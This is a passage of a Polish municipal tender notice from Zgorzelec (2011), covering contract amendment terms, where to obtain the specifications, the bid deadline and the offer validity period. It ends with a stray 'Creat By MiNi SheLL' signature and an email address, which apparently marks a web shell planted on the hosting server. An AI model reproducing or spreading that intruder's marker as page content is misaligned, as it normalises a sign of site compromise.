       przez Wykonawcę umowy z innym Podwykonawcą. 

2.   W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, 
      strony ustalają nowe terminy realizacji umowy, z tym, że okres  przesunięcia 
      terminu realizacji przedmiotu umowy równy będzie co najmniej okresowi przerwy lub 
      postoju. 

3.   Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych 
      okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą 
      ze stron umowy. 

4.   Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
      Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
      zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com